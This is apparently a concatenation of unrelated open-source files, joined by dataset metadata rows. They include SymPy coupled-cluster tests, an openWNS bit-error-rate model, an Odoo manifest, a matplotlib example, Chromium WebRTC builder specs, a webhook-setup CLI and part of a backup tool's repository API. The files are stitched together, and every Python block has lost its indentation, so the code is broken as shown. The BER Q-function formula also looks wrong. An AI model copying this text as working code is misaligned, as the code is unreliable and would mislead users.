def test_dummy_order_inner_outer_lines_VT1T1T1_AT():
ii = symbols('i', below_fermi=True)
aa = symbols('a', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
# Coupled-Cluster T1 terms with V*T1*T1*T1
# t^{a}_{k} t^{c}_{i} t^{d}_{l} v^{lk}_{dc}
exprs = [
# permut v and t <=> swapping internal lines, equivalent
# irrespective of symmetries in v
atv(k, l, c, d)*att(c, ii)*att(d, l)*att(aa, k),
atv(l, k, c, d)*att(c, ii)*att(d, k)*att(aa, l),
atv(k, l, d, c)*att(d, ii)*att(c, l)*att(aa, k),
atv(l, k, d, c)*att(d, ii)*att(c, k)*att(aa, l),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_dummy_order_inner_outer_lines_VT1T1T1T1_AT():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
# Coupled-Cluster T2 terms with V*T1*T1*T1*T1
# non-equivalent substitutions (change of sign)
exprs = [
# permut t <=> swapping external lines
atv(k, l, c, d)*att(c, ii)*att(d, jj)*att(aa, k)*att(bb, l),
atv(k, l, c, d)*att(c, jj)*att(d, ii)*att(aa, k)*att(bb, l),
atv(k, l, c, d)*att(c, ii)*att(d, jj)*att(bb, k)*att(aa, l),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == -substitute_dummies(permut)
# equivalent substitutions
exprs = [
atv(k, l, c, d)*att(c, ii)*att(d, jj)*att(aa, k)*att(bb, l),
# permut t <=> swapping external lines
atv(k, l, c, d)*att(c, jj)*att(d, ii)*att(bb, k)*att(aa, l),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT1T1_AT():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
exprs = [ # permute v. Different dummy order. Not equivalent.
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(j, i, a, b)*att(a, i)*att(b, j),
atv(i, j, b, a)*att(a, i)*att(b, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v. Different dummy order. Equivalent
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(j, i, b, a)*att(a, i)*att(b, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [ # permute t. Same dummy order, not equivalent.
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(i, j, a, b)*att(b, i)*att(a, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Different dummy order, equivalent
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(j, i, a, b)*att(a, j)*att(b, i),
atv(i, j, b, a)*att(b, i)*att(a, j),
atv(j, i, b, a)*att(b, j)*att(a, i),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT2conjT2_AT():
# this diagram requires special handling in TCE
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
# atv(abcd)att(abij)att(ijcd)
template = atv(p1, p2, p3, p4)*att(p1, p2, i, j)*att(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
template = atv(p1, p2, p3, p4)*att(p1, p2, j, i)*att(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
# atv(abcd)att(abij)att(jicd)
template = atv(p1, p2, p3, p4)*att(p1, p2, i, j)*att(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
template = atv(p1, p2, p3, p4)*att(p1, p2, j, i)*att(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2conjT2_ambiguous_order_AT():
# These diagrams invokes _determine_ambiguous() because the
# dummies can not be ordered unambiguously by the key alone
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
# atv(abcd)att(abij)att(cdij)
template = atv(p1, p2, p3, p4)*att(p1, p2, i, j)*att(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
template = atv(p1, p2, p3, p4)*att(p1, p2, j, i)*att(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2_AT():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
exprs = [
# permute v. Same dummy order, not equivalent.
atv(i, j, a, b)*att(a, b, i, j),
atv(j, i, a, b)*att(a, b, i, j),
atv(i, j, b, a)*att(a, b, i, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permute t.
atv(i, j, a, b)*att(a, b, i, j),
atv(i, j, a, b)*att(b, a, i, j),
atv(i, j, a, b)*att(a, b, j, i),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Relabelling of dummies should be equivalent.
atv(i, j, a, b)*att(a, b, i, j),
atv(j, i, a, b)*att(a, b, j, i),
atv(i, j, b, a)*att(b, a, i, j),
atv(j, i, b, a)*att(b, a, j, i),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_VT2T2_AT():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
exprs = [
atv(k, l, c, d)*att(aa, c, ii, k)*att(bb, d, jj, l),
atv(l, k, c, d)*att(aa, c, ii, l)*att(bb, d, jj, k),
atv(k, l, d, c)*att(aa, d, ii, k)*att(bb, c, jj, l),
atv(l, k, d, c)*att(aa, d, ii, l)*att(bb, c, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
atv(k, l, c, d)*att(aa, c, ii, k)*att(d, bb, jj, l),
atv(l, k, c, d)*att(aa, c, ii, l)*att(d, bb, jj, k),
atv(k, l, d, c)*att(aa, d, ii, k)*att(c, bb, jj, l),
atv(l, k, d, c)*att(aa, d, ii, l)*att(c, bb, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
atv(k, l, c, d)*att(c, aa, ii, k)*att(bb, d, jj, l),
atv(l, k, c, d)*att(c, aa, ii, l)*att(bb, d, jj, k),
atv(k, l, d, c)*att(d, aa, ii, k)*att(bb, c, jj, l),
atv(l, k, d, c)*att(d, aa, ii, l)*att(bb, c, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_pqrs_AT():
ii, jj = symbols('i j')
aa, bb = symbols('a b')
k, l = symbols('k l', cls=Dummy)
c, d = symbols('c d', cls=Dummy)
exprs = [
atv(k, l, c, d)*att(aa, c, ii, k)*att(bb, d, jj, l),
atv(l, k, c, d)*att(aa, c, ii, l)*att(bb, d, jj, k),
atv(k, l, d, c)*att(aa, d, ii, k)*att(bb, c, jj, l),
atv(l, k, d, c)*att(aa, d, ii, l)*att(bb, c, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_canonical_ordering_AntiSymmetricTensor():
v = symbols("v")
virtual_indices = ('c', 'd')
occupied_indices = ('k', 'l')
c, d = symbols(('c','d'), above_fermi=True,
cls=Dummy)
k, l = symbols(('k','l'), below_fermi=True,
cls=Dummy)
# formerly, the left gave either the left or the right
assert AntiSymmetricTensor(v, (k, l), (d, c)
) == -AntiSymmetricTensor(v, (l, k), (d, c))
| gpl-2.0 | 8,171,116,117,596,623,000 | 36.433657 | 86 | 0.545236 | false |
creasyw/IMTAphy | modules/phy/copper/PyConfig/copper/TimeDependentDistBER.py | 1 | 5027 | ###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2009
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 5, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22242
# email: [email protected]
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import openwns.distribution
import openwns.pyconfig
from math import pi
from math import exp
from math import log10
class TimeDependentDistBER(openwns.pyconfig.Sealed):
"""This class is providing a time distributed BER in the form:
BER
| * *
| * *
| * *
| * *
| * *
| * *
| * *
| * *
| * *
| ***
|____________|____________ time
Distance:start middle end
After giving the start,the middle distance and the step the rest from middle to end will be generated automatically.
The BER is then calculated from the distances between the nodes and is distributed in time
usind wns.Distribution.TimeDependent(time,wns.Distribution.Uniform).
The curve can be repeated as many times as needed.
"""
B=None
Ps=None
gs= None
gr=None
gamma=None
f= None
c= None
_lambda=None
d0=None
k=None
T=None
def __init__ (self, dataRate, efficiency =1.0, Ps = 0.1, gs = 1, gr = 1, gamma = 2.4, f = 5.5*1E+9, c = 3.0*1E+8, d0 = 1.0, k = 1.38*1E-23, T = 290):
self.B = dataRate/efficiency
self.Ps = Ps
self.gs = gs
self.gr = gr
self.gamma = gamma
self.f = f
self.c = c
self._lambda = c/f
self.d0 = d0
self.k = k
self.T = T
def getDistribution(self, simulationTime, repeatBERCurve, startDistance, middleDistance, step):
dist = openwns.distribution.TimeDependent()
start = startDistance
middle = middleDistance
distanceList = []
step = step
time = 0
last = None
for i in xrange(start, middle, -step):
distanceList.append(i)
last=i
for i in xrange(last, start+step, step):
distanceList.append(i)
deltaT = (simulationTime/repeatBERCurve) / len(distanceList)
for k in xrange(repeatBERCurve):
for j in xrange(len(distanceList)):
dist.eventList.append(openwns.distribution.Event(time, openwns.distribution.Uniform(1.4*self.getBER(distanceList[j]), 0.6*self.getBER(distanceList[j]))))
time = time + deltaT
return dist
def getBER(self, distance):
Noise=self.k*self.T*self.B
Noise_dbm=10*log10(Noise*1000)
const=self.Ps*self.gs*self.gr*pow((self._lambda/(4*pi*self.d0)),2)
Pr=const*pow((self.d0/distance),self.gamma)
SINR=10*log10(Pr*1000)-Noise_dbm
BER=self.getQ(pow(2*SINR,0.5))
return BER
def getQ(self, x):
Q=((1.0/x*pow(2*pi,0.5))*exp(-(pow(x,2)/2)))
return Q
def findDistanceForThreshold(self, distance, threshold, side):
# side = 1 means bigger than the threshold, side = 0 means smaller than the threshold
if side == 1:
if self.getBER(distance) >= threshold:
return distance
if side == 0:
if self.getBER(distance) < threshold:
return distance
return 0
def findDistanceForThresholdFromList(self, distanceList, threshold, side):
# side = 1 means bigger than the threshold, side = 0 means smaller than the threshold
if side == 1:
for j in xrange(len(distanceList)):
if self.getBER(distanceList[j]) >= threshold:
return distanceList[j]
if side == 0:
for i in xrange(len(distanceList)):
if self.getBER(distanceList[i])<threshold:
return distanceList[i]
| gpl-2.0 | -1,640,753,965,825,216,300 | 36.514925 | 169 | 0.536901 | false |
hbrunn/bank-payment | account_banking_mandate/__openerp__.py | 1 | 1321 | # -*- coding: utf-8 -*-
# © 2014 Compassion CH - Cyril Sester <[email protected]>
# © 2014 Serv. Tecnol. Avanzados - Pedro M. Baeza
# © 2015 Akretion - Alexis de Lattre <[email protected]>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
{
'name': 'Account Banking Mandate',
'summary': 'Banking mandates',
'version': '8.0.0.2.0',
'license': 'AGPL-3',
'author': "Compassion CH, "
"Serv. Tecnol. Avanzados - Pedro M. Baeza, "
"Akretion, "
"Odoo Community Association (OCA)",
'website': 'https://github.com/OCA/bank-payment',
'category': 'Banking addons',
'depends': [
'account_banking_payment_export',
],
'data': [
'views/account_banking_mandate_view.xml',
'views/account_invoice_view.xml',
'views/account_payment_view.xml',
'views/res_partner_bank_view.xml',
'views/bank_payment_line_view.xml',
'data/mandate_reference_sequence.xml',
'data/report_paperformat.xml',
'security/mandate_security.xml',
'security/ir.model.access.csv',
'reports/account_banking_mandate_view.xml',
'reports/account_banking_mandate.xml',
],
'demo': [],
'test': ['test/banking_mandate.yml'],
'installable': True,
}
| agpl-3.0 | -7,318,439,020,409,000,000 | 34.621622 | 68 | 0.600152 | false |
sniemi/SamPy | sandbox/src1/examples/multi_image.py | 1 | 1769 | #!/usr/bin/env python
'''
Make a set of images with a single colormap, norm, and colorbar.
It also illustrates colorbar tick labelling with a multiplier.
'''
from matplotlib.pyplot import figure, show, sci
from matplotlib import cm, colors
from matplotlib.font_manager import FontProperties
from numpy import amin, amax, ravel
from numpy.random import rand
Nr = 3
Nc = 2
fig = figure()
cmap = cm.cool
figtitle = 'Multiple images'
t = fig.text(0.5, 0.95, figtitle,
horizontalalignment='center',
fontproperties=FontProperties(size=16))
cax = fig.add_axes([0.2, 0.08, 0.6, 0.04])
w = 0.4
h = 0.22
ax = []
images = []
vmin = 1e40
vmax = -1e40
for i in range(Nr):
for j in range(Nc):
pos = [0.075 + j*1.1*w, 0.18 + i*1.2*h, w, h]
a = fig.add_axes(pos)
if i > 0:
a.set_xticklabels([])
# Make some fake data with a range that varies
# somewhat from one plot to the next.
data =((1+i+j)/10.0)*rand(10,20)*1e-6
dd = ravel(data)
# Manually find the min and max of all colors for
# use in setting the color scale.
vmin = min(vmin, amin(dd))
vmax = max(vmax, amax(dd))
images.append(a.imshow(data, cmap=cmap))
ax.append(a)
# Set the first image as the master, with all the others
# observing it for changes in cmap or norm.
norm = colors.Normalize(vmin=vmin, vmax=vmax)
for i, im in enumerate(images):
im.set_norm(norm)
if i > 0:
images[0].add_observer(im)
# The colorbar is also based on this master image.
fig.colorbar(images[0], cax, orientation='horizontal')
# We need the following only if we want to run this
# script interactively and be able to change the colormap.
sci(images[0])
show()
| bsd-2-clause | 9,214,454,940,438,378,000 | 23.232877 | 64 | 0.637648 | false |
eunchong/build | scripts/slave/recipe_modules/chromium_tests/chromium_webrtc_fyi.py | 1 | 3616 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import collections
from . import chromium_linux
from . import chromium_mac
from . import chromium_win
from . import chromium_webrtc
# GN builders are added first. They're setup to be as similar as possible to
# the builders in Chromium, to be able to detect breakages pre-roll.
SPEC = {
'settings': {
'build_gs_bucket': 'chromium-webrtc',
},
'builders': {},
}
def AddGNBuilder(spec, name):
SPEC['builders'][name] = copy.deepcopy(spec['builders'][name])
AddGNBuilder(chromium_linux.SPEC, 'Android GN')
AddGNBuilder(chromium_linux.SPEC, 'Android GN (dbg)')
AddGNBuilder(chromium_mac.SPEC, 'Mac GN')
AddGNBuilder(chromium_mac.SPEC, 'Mac GN (dbg)')
AddGNBuilder(chromium_win.SPEC, 'Win x64 GN')
AddGNBuilder(chromium_win.SPEC, 'Win x64 GN (dbg)')
for b in SPEC['builders'].itervalues():
b.setdefault('gclient_apply_config', [])
b['gclient_apply_config'].append('chromium_webrtc_tot')
b['tests'] = [] # These WebRTC builders only run compile.
# Remaining builders are WebRTC-specific builders that compile and run tests
# that are focused on testing WebRTC functionality. Some of these tests are
# marked MANUAL since they require audio and/or video devices on the machine
# they run at.
_builders = collections.defaultdict(dict)
def AddBuildSpec(name, platform, target_bits=64, build_config='Release'):
SPEC['builders'][name] = chromium_webrtc.BuildSpec(
platform, target_bits, build_config=build_config,
gclient_config='chromium_webrtc_tot')
assert target_bits not in _builders[platform]
_builders[platform][target_bits] = name
def AddTestSpec(name, perf_id, platform, target_bits=64,
build_config='Release'):
parent_builder = _builders[platform][target_bits]
SPEC['builders'][name] = chromium_webrtc.TestSpec(
parent_builder,
perf_id,
platform,
target_bits,
build_config,
gclient_config='chromium_webrtc_tot',
test_spec_file='chromium.webrtc.fyi.json')
AddBuildSpec('Win Builder', 'win', target_bits=32)
AddBuildSpec('Mac Builder', 'mac')
AddBuildSpec('Linux Builder', 'linux')
AddBuildSpec('Android Builder (dbg)', 'android', target_bits=32,
build_config='Debug')
AddBuildSpec('Android Builder ARM64 (dbg)', 'android', build_config='Debug')
AddTestSpec('Win7 Tester', 'chromium-webrtc-trunk-tot-rel-win7', 'win',
target_bits=32)
AddTestSpec('Win10 Tester', 'chromium-webrtc-trunk-tot-rel-win10', 'win',
target_bits=32)
AddTestSpec('Mac Tester', 'chromium-webrtc-trunk-tot-rel-mac', 'mac')
AddTestSpec('Linux Tester', 'chromium-webrtc-trunk-tot-rel-linux', 'linux')
AddTestSpec('Android Tests (dbg) (K Nexus5)',
'chromium-webrtc-trunk-tot-dbg-android-nexus5-k', 'android',
target_bits=32, build_config='Debug')
AddTestSpec('Android Tests (dbg) (L Nexus5)',
'chromium-webrtc-trunk-tot-dbg-android-nexus5', 'android',
target_bits=32, build_config='Debug')
AddTestSpec('Android Tests (dbg) (L Nexus6)',
'chromium-webrtc-trunk-tot-dbg-android-nexus6', 'android',
target_bits=32, build_config='Debug')
AddTestSpec('Android Tests (dbg) (L Nexus7.2)',
'chromium-webrtc-trunk-tot-dbg-android-nexus72', 'android',
target_bits=32, build_config='Debug')
AddTestSpec('Android Tests (dbg) (L Nexus9)',
'chromium-webrtc-trunk-tot-dbg-android-nexus9', 'android',
build_config='Debug')
| bsd-3-clause | -8,831,264,559,717,010,000 | 36.666667 | 76 | 0.694137 | false |
BackSlasher/greg | greg/__main__.py | 1 | 2640 | #!/usr/bin/env python
import argparse
import greg.config
def main():
parser = argparse.ArgumentParser(description='Integrate your build server and source control')
parser.add_argument('--config', default='config.yaml', help='Path to config file')
parser.add_argument('--fix-hooks', action='store_const', const='fixhooks', dest='action', help='Ensure repos alert greg on changes')
parser.add_argument('--url', help='Base URL for greg')
args = parser.parse_args()
# Establish config filename
greg.config.get_config(args.config)
if args.action == 'fixhooks':
fix_hooks(args)
#TODO handle http server using greg.server as well
#import greg.server
#greg.server.start()
else:
print 'Not doing anything'
def fix_hooks(args):
import greg.provider
import greg.builder
from urlparse import urlparse
import re
# Reject when no url
if not args.url:
raise Exception('Must have URL to fix hooks')
my_url = args.url
# Enumerate all repo entries in config
config = greg.config.get_config()
for repo_conf in config.repos:
provider = greg.provider.locate_bridge(repo_conf.provider)
# Build proper URL
provider_url = urlparse(my_url)
provider_url = provider_url._replace(path=re.sub('/*$','/',provider_url.path)+'repo')
provider_url = provider_url._replace(query='provider=%s&token=%s'%(repo_conf.provider,provider.incoming_token))
# Enumerate over all organizations
for org in repo_conf.organizations:
# Find all repos that match the repo config
all_repos = provider.list_repos(org)
repos = filter(lambda repo: repo_conf.match(repo_conf.provider, org, repo), all_repos)
for repo in repos:
# Ensure webhooks on that repo
provider.ensure_webhook(org,repo,provider_url.geturl())
# Collect all jobs and builders
jobs = set([(job.name,job.builder) for repo in config.repos for job in repo.jobs.values()])
builders = set([job[1] for job in jobs])
for builder_name in builders:
builder_jobs = set([job[0] for job in jobs if job[1]==builder_name])
builder = greg.builder.locate_bridge(builder_name)
builder_url = urlparse(my_url)
builder_url = builder_url._replace(path=re.sub('/*$','/',builder_url.path)+'build')
builder_url = builder_url._replace(query='builder=%s&token=%s'%(builder_name,builder.incoming_token))
for job_name in builder_jobs:
builder.ensure_webhook(job_name,builder_url.geturl())
if __name__ == "__main__":
main()
| gpl-3.0 | 1,664,957,608,571,238,400 | 41.580645 | 136 | 0.653788 | false |
jhnphm/boar | front.py | 1 | 29536 | # -*- coding: utf-8 -*-
# Copyright 2010 Mats Ekberg
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" The Front class serves two important purposes. First, it is the
API of boar. All interaction with a repository must happen through
this interface. Secondly, all arguments and return values are
primitive values that can be serialized easily, which makes it easy to
implement an RPC mechanism for this interface.
"""
from blobrepo import repository
from boar_exceptions import *
import sys
from time import ctime, time
from common import md5sum, is_md5sum, warn, get_json_module, StopWatch, calculate_progress
from boar_common import SimpleProgressPrinter
from blobrepo.sessions import bloblist_fingerprint
import copy
json = get_json_module()
import base64
def get_file_contents(front, session_name, file_name):
"""This is a convenience function to get the full contents of a
named file from the latest revision of a named session. It must
only be used on files that are known to be of a reasonable
size. The session must exist or an SessionNotFoundError will the
thrown. If there is a session, but no matching file, None is
returned."""
rev = front.find_last_revision(session_name)
if not rev:
raise SessionNotFoundError("No such session: %s" % session_name)
for blobinfo in front.get_session_bloblist(rev):
if blobinfo['filename'] == file_name:
blob_reader = front.get_blob(blobinfo['md5sum'])
return blob_reader.read()
return None
def add_file_simple(front, filename, contents):
"""Adds a file with contents to a new snapshot. The front instance
"create_session()" must have been called before this function is
used, or an exception will be thrown."""
content_checksum = md5sum(contents)
if not front.has_blob(content_checksum) and not front.new_snapshot_has_blob(content_checksum):
front.init_new_blob(content_checksum, len(contents))
front.add_blob_data(content_checksum, base64.b64encode(contents))
front.blob_finished(content_checksum)
now = int(time())
front.add({'filename': filename,
'md5sum': content_checksum,
'ctime': now,
'mtime': now,
'size': len(contents)})
def set_file_contents(front, session_name, filename, contents):
"""Creates a new snapshot and replaces/creates the given file in
the session."""
if get_file_contents(front, session_name, filename) == contents:
return # No changes necessary
rev = front.find_last_revision(session_name)
front.create_session(session_name, base_session = rev)
add_file_simple(front, filename, contents)
front.commit(session_name)
valid_session_props = set(["ignore", "include"])
def clone(from_front, to_front):
from_front.acquire_repo_lock()
to_front.acquire_repo_lock()
try:
__clone(from_front, to_front)
finally:
# Always try to release the locks, but any errors here are
# probably not very interesting, let's ignore them.
try: to_front.release_repo_lock()
except: pass
try: from_front.release_repo_lock()
except: pass
def __clone(from_front, to_front):
# Check that other repo is a continuation of this one
assert is_continuation(base_front = to_front, cont_front = from_front), \
"Cannot pull: %s is not a continuation of %s" % (from_front, to_front)
# Copy all new sessions
other_max_rev = from_front.get_highest_used_revision()
self_max_rev = to_front.get_highest_used_revision()
self = to_front
other_repo = from_front
assert other_max_rev >= self_max_rev
sessions_to_clone = range(self_max_rev + 1, other_max_rev + 1)
count = 0
all_deleted_snapshots = from_front.get_deleted_snapshots()
snapshots_to_delete = find_snapshots_to_delete(from_front, to_front)
if snapshots_to_delete:
# It should not be possible to have incoming deleted snapshots
# without at least one new snapshot as well.
if not to_front.allows_permanent_erase():
raise UserError("Source repo has deleted snapshots, but destination repo does not allow deletions")
assert sessions_to_clone
for session_id in sessions_to_clone:
count += 1
print "Cloning snapshot %s (%s/%s)" % (session_id, count, len(sessions_to_clone))
if session_id in all_deleted_snapshots:
self.create_session(u"__deleted")
if snapshots_to_delete:
to_front.erase_snapshots(snapshots_to_delete)
snapshots_to_delete = None
deleted_name, deleted_fingerprint = from_front.get_deleted_snapshot_info(session_id)
self.commit_deleted_snapshot(deleted_name, deleted_fingerprint)
else:
base_session = other_repo.get_base_id(session_id)
session_info = other_repo.get_session_info(session_id)
session_name = session_info['name']
self.create_session(session_name, base_session)
if snapshots_to_delete:
to_front.erase_snapshots(snapshots_to_delete)
snapshots_to_delete = None
__clone_single_snapshot(from_front, to_front, session_id)
self.commit_raw(session_name = session_name, log_message = session_info.get("log_message", None),
timestamp = session_info.get('timestamp', None), date = session_info['date'])
if self.allows_permanent_erase():
removed_blobs_count = self.erase_orphan_blobs()
print "Found and removed", removed_blobs_count," orphan blobs"
def find_snapshots_to_delete(from_front, to_front):
""" Find all snapshots in from_front that has been deleted, but
has not yet been deleted in the clone to_front. """
snapshots_to_delete = []
self_max_rev = to_front.get_highest_used_revision()
already_deleted_snapshots = set(to_front.get_deleted_snapshots())
for rev in from_front.get_deleted_snapshots():
if rev > self_max_rev:
continue
if rev in already_deleted_snapshots:
continue
deleted_name, deleted_fingerprint = from_front.get_deleted_snapshot_info(rev)
session_info = to_front.get_session_info(rev)
assert session_info['name'] == deleted_name
assert to_front.get_session_fingerprint(rev) == deleted_fingerprint
snapshots_to_delete.append(rev)
return snapshots_to_delete
def __clone_single_snapshot(from_front, to_front, session_id):
""" This function requires that a new snapshot is underway in
to_front. It does not commit that snapshot. """
assert from_front != to_front
other_bloblist = from_front.get_session_bloblist(session_id)
other_raw_bloblist = from_front.get_session_raw_bloblist(session_id)
for n, blobinfo in enumerate(other_raw_bloblist):
action = blobinfo.get("action", None)
if not action:
md5sum = blobinfo['md5sum']
if not (to_front.has_blob(md5sum) or to_front.new_snapshot_has_blob(md5sum)):
pp = SimpleProgressPrinter(sys.stdout,
label="Sending blob %s of %s (%s MB)" %
(n+1, len(other_raw_bloblist),
round(blobinfo['size'] / (1.0 * 2**20), 3)))
sw = StopWatch(enabled=False, name="front.clone")
to_front.init_new_blob(md5sum, blobinfo['size'])
sw.mark("front.init_new_blob()")
datasource = from_front.get_blob(md5sum)
pp.update(0.0)
datasource.set_progress_callback(pp.update)
to_front.add_blob_data_streamed(blob_md5 = md5sum,
datasource = datasource)
pp.finished()
sw.mark("front.add_blob_data_streamed()")
to_front.blob_finished(md5sum)
sw.mark("front.finished()")
to_front.add(blobinfo)
elif action == "remove":
to_front.remove(blobinfo['filename'])
else:
assert False, "Unexpected blobinfo action: " + str(action)
def is_identical(front1, front2):
""" Returns True iff the other repo contains the same sessions
with the same fingerprints as this repo."""
if not is_continuation(base_front = front2, cont_front = front2):
return False
return set(front1.get_session_ids()) == set(front2.get_session_ids())
def is_continuation(base_front, cont_front):
""" Returns True if the other repo is a continuation of this
one. That is, the other repo contains all the sessions of this
repo, and then zero of more additional sessions."""
if set(base_front.get_session_ids()) > set(cont_front.get_session_ids()):
# Not same sessions - cannot be successor
return False
other_deleted = cont_front.get_deleted_snapshots()
for session_id in base_front.get_session_ids():
if session_id in other_deleted:
continue
base_front_session_info = base_front.get_session_info(session_id)
cont_front_session_info = cont_front.get_session_info(session_id)
if base_front_session_info['name'] != cont_front_session_info['name']:
return False
if base_front.get_session_fingerprint(session_id) != cont_front.get_session_fingerprint(session_id):
return False
return True
def verify_repo(front, verify_blobs = True, verbose = False):
"""Returns True if the repo was clean. Otherwise throws an
exception."""
for rev in range(1, front.repo_get_highest_used_revision() + 1):
front.repo_verify_snapshot(rev)
session_ids = front.get_session_ids()
if verbose: print "Verifying %s snapshots" % (len(session_ids))
existing_blobs = set(front.get_all_raw_blobs()) | set(front.get_all_recipes())
for i in range(0, len(session_ids)):
id = session_ids[i]
bloblist = front.get_session_bloblist(id) # We must not use a
# cached bloblist
# here - we're
# verifying the
# repo!
calc_fingerprint = bloblist_fingerprint(bloblist)
if calc_fingerprint != front.get_session_fingerprint(id):
raise CorruptionError("Fingerprint didn't match for snapshot %s" % id)
for bi in bloblist:
if bi['md5sum'] not in existing_blobs:
raise CorruptionError("Snapshot %s is missing blob %s" % (session_ids[i], bi['md5sum']))
if verbose: print "Snapshot %s (%s): All %s blobs ok" % (id, calc_fingerprint, len(bloblist))
if not verify_blobs:
if verbose: print "Skipping blob verification"
return True
if verbose: print "Collecting a list of all blobs..."
count = front.init_verify_blobs()
if verbose: print "Verifying %s blobs..." % (count)
done = 0
while done < count:
done += len(front.verify_some_blobs())
if verbose: print done, "of "+str(count)+" blobs verified, "+ \
str(round(1.0*done/count * 100,1)) + "% done."
return True
class Front:
def __init__(self, repo):
self.repo = repo
self.new_session = None
